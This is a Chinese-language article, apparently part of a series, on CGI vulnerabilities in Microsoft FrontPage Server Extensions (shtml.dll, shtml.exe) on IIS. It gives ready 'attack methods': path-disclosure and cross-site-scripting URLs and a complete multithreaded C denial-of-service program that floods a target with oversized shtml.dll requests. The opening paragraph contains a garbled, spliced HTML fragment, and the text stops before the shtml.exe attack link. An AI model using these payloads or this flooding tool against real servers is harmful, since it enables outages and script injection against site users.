TWWWSCAN漏洞扫描器CGI漏洞攻击(2)

　　11．shtml.dll

　　在FrontpageExtention Server/Windows2000 Server上输入一个不存在的文件将可以得到web目录的本地路径信息. 但是如果我们请求并非HTML、SHTML或者ASP后缀的文件，我们将会得到不同的信息. Hostile Code Here">http://TrustedServer如果用户点击上述指定的链接，脚本将通过HTTP请求从客户端传送给可信任的站点，可信任站点然后将该脚本作为错误信息的一部分返回给客户端。客户端在收到包含该脚本的出错页面时，将执行该脚本，并将赋予来自可信任站点的内容的所有权力赋予该脚本。另外，shtml.dll对较长的带html后缀的文件名都会进行识别和处理，利用这一点，可以对IIS服务器执行DOS攻击，以下这个程序，能使目标服务器的CPU占用率达到 100%，并且耗用所有的应用程序日志空间。系统在数分钟内会报告应用程序日志已满。

　　攻击方法：

　　1. 暴露路径：http://www.victim.com/_vti_bin/shtml.dll/something.html

　　这样将返回以下信息：

　　Cannot open "d:\inetpub\wwwroot\postinfo1.html": no such file or folder.

　　2. 可信任站点执行脚本：使用如下格式的URL： http://iis5server/_vti_bin/shtml.dll/alert('document.domain='+document.domain)

　　3. D.o.s攻击：使用下面的程序可以能使目标服务器的CPU占用率达到 100%，并且耗用所有的应用程序日志空间。

　　#include

　　#include

　　#include

　　#include

　　#include

　　void Dos(void *chara);

　　void main(int argc,char *argv[])

　　{

　　WORD wVersionRequested;

　　WSADATA wsaData;

　　int err;

　　long lDo ;

　　if (argc <2)

　　{

　　printf("Usage: %s IP\n",argv[0]);

　　exit(1);

　　return ;

　　}

　　wVersionRequested = MAKEWORD( 2, 2 );

　　err = WSAStartup( wVersionRequested, &wsaData );

　　if ( err != 0 )

　　{

　　return;

　　}

　　if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 2 )

　　{

　　WSACleanup( );

　　return;

　　}

　　printf("wait ...\n");

　　for (lDo = 0 ;lDo <1000;lDo++)

　　{

　　//printf("1\n");

　　_beginthread(Dos, 0, (void*)argv[1]);

　　}

　　Sleep( 1000000L );

　　}

　　void Dos(void *chara)

　　{

　　long lLen;

　　long lDo ;

　　char *ip ;

　　char buffer[2000];

　　struct sockaddr_in serv_addr;

　　SOCKET sockfd ;

　　char plusvuln[]="GET /_vti_bin/shtml.dll/";

　　ip= (char*)chara;

　　memset(buffer,'\0',2000);

　　serv_addr.sin_family =AF_INET;

　　serv_addr.sin_addr.s_addr = inet_addr("192.168.0.131");

　　serv_addr.sin_port = htons(80);

　　if ((sockfd =socket(AF_INET,SOCK_STREAM,0))<0)

　　{

　　printf("Create Socket faild \n");

　　return ;

　　}

　　if (connect(sockfd,(struct sockaddr*)&serv_addr,sizeof(serv_addr))<0)

　　{

　　printf("Connect faild \n");;

　　}

　　else

　　{

　　lLen = send ( sockfd,plusvuln,strlen(plusvuln),0 );

　　for (lDo = 0 ;lDo <7000;lDo ++)

　　{

　　lLen = send ( sockfd,"postinfdddddddddd",strlen("postinfdddddddddd"),0) ;

　　if (lLen <0 )

　　{

　　printf("Send faild \n");

　　return;

　　}

　　}

　　lLen = send ( sockfd,"tzl.html HTTP/1.0\n\n",strlen

　　("tzl.html HTTP/1.0\n\n") + 1,0) ;

　　//recv(sockfd,buffer,2000,0);

　　//printf(buffer);

　　//printf("\n");

　　}

　　closesocket(sockfd);

　　}

　　___________________________________________________________________

　　12．shtml.exe

　　微软的 FrontPage Server Extensions存在一个远程拒绝服务漏洞，可能远程关闭一个web站点上的所有FrontPage操作。通过提交一个包含DOS设备名的链接， FrontPage Server Extensions就会挂起，不再响应后续的请求。为了恢复正常工作，必须重新启动IIS或者重新启动机器。

　　攻击方法：

　　提交这样的链接，都可能使FrontPage Server Extensions停止响应：